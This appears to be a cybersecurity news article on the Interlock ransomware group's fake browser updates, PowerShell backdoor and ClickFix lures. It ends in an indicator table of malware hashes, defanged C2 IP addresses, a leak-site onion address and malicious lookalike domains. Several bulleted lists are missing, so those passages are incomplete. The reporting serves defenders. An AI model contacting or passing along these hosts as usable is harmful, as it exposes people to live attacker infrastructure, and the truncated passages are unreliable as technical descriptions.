The Interlock ransomware intrusion set has escalated its operations across North America and Europe with sophisticated techniques.
Not falling under the typical Ransomware-as-a-Service (RaaS) category, Interlock operates independently, focusing primarily on Big Game Hunting and double extortion campaigns.
This group’s activities have been closely monitored by cybersecurity firms such as Sekoia Threat Detection & Research (TDR) and others, revealing their evolving tactics and tools.
Interlock initiates its attack by compromising legitimate websites to host deceptive browser update pages, leveraging the trust users have in these platforms.
Here’s how the attack unfolds:
1. Fake Updater Deployment:
The ransomware’s initial access vector is a fake browser update hosted on compromised websites.
These updates appear as legitimate Google Chrome or Microsoft Edge installers but are, in fact, PyInstaller files. When a user executes this update, it:
2.PowerShell Backdoor:
This script operates in a loop, continuously executing HTTP requests to communicate with command-and-control (C2) servers. It’s designed for resilience, utilizing:
3.Command Execution:
The C2 server can issue various commands, including:
According to the Report, Interlock’s operators employ a strategy of IP address clustering to maintain their infrastructure’s resilience:
Each cluster typically includes:
Around January 2025, Interlock adopted the ClickFix technique:
The sophistication and evolution of Interlock’s tactics, from using fake browser updates to employing social engineering techniques like ClickFix, illustrate its adaptability and potential for further growth.
With a focus on high-value targets and the ability to evade traditional network security, Interlock remains a significant threat.
Cybersecurity measures must be updated continuously to counter the dynamic strategies of this ransomware group.
The following table lists the IoCs associated with Interlock’s activities:
Category | Indicator Type | Indicators |
---|---|---|
Fake Updater | SHA-256 | 576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296, f962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c, … (additional hashes) |
ClickFix PowerShell Loaders | SHA-256 | 5c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e, eb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34, … (additional hashes) |
Interlock RAT | SHA-256 | 1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83, 299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2, … (additional hashes) |
Keylogger | SHA-256 | 5cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8, df41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782, … (additional hashes) |
BerserkStealer | SHA-256 | eb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692, a5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf |
LummaStealer | SHA-256 | 4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e |
Windows Interlock ransomware | SHA-256 | 4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9, 33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9, … (additional hashes) |
Small autoremove DLL used by the ransomware | SHA-256 | c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f |
Linux Interlock ransomware | SHA-256 | 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f |
Data Leak Site | URL | http://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion |
Backdoor C2 – Cluster 1 | IP Address | 23.95.182[.]59, 195.201.21[.]34, 159.223.46[.]184 |
Backdoor C2 – Cluster 2 | IP Address | 23.227.203[.]162, 65.109.226[.]176, 65.38.120[.]47 |
Backdoor C2 – Cluster 3 | IP Address | 216.245.184[.]181, 212.237.217[.]182, 168.119.96[.]41 |
Backdoor C2 – Cluster 4 | IP Address | 216.245.184[.]170, 65.108.80[.]58, 84.200.24[.]41 |
Backdoor C2 – Cluster 5 | IP Address | 206.206.123[.]65, 49.12.102[.]206, 193.149.180[.]158 |
Backdoor C2 – Cluster 6 | IP Address | 85.239.52[.]252, 5.252.177[.]228, 80.87.206[.]189 |
Backdoor C2 – Cluster 7 | IP Address | 65.108.80[.]58, 212.104.133[.]72, 140.82.14[.]117 |
Backdoor C2 – Cluster 8 | IP Address | 64.94.84[.]85, 49.12.69[.]80, 96.62.214[.]11 |
Backdoor C2 – Cluster 9 | IP Address | 177.136.225[.]153, 188.34.195[.]44, 45.61.136[.]202 |
Compromised URLs | URL | http://topsportracing[.]com/wp-az, http://topsportracing[.]com/az10, https://airbluefootgear[.]com/wp-includes/images/xits.php, … (additional URLs) |
ClickFix URLs | URL | https://microsoft-msteams[.]com/additional-check.html, https://microstteams[.]com/additional-check.html, https://advanceipscaner[.]com/additional-check.html, … (additional URLs) |
PowerShell backdoor C2 domains | URL | refrigerator-cheers-indicator-ferrari[.]trycloudflare.com, analytical-russell-cincinnati-settings[.]trycloudflare.com, … (additional URLs) |
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Netcraft has uncovered a sharp rise in recruitment scams in 2024, driven by three distinct…
Silent Push researchers have identified that the notorious hacker collective Scattered Spider, also known as…
A critical remote code execution (RCE) vulnerability, identified as CVE-2025-31324, in SAP NetWeaver Visual Composer…
Cybercriminals are increasingly targeting IT administrators through sophisticated Search Engine Optimization (SEO) poisoning techniques. By…
Cybersecurity researchers are raising the alarm about a newly discovered commodity ransomware strain dubbed Mamona, which…
A seemingly innocuous Python package named ‘discordpydebug’ surfaced on the Python Package Index (PyPI) under…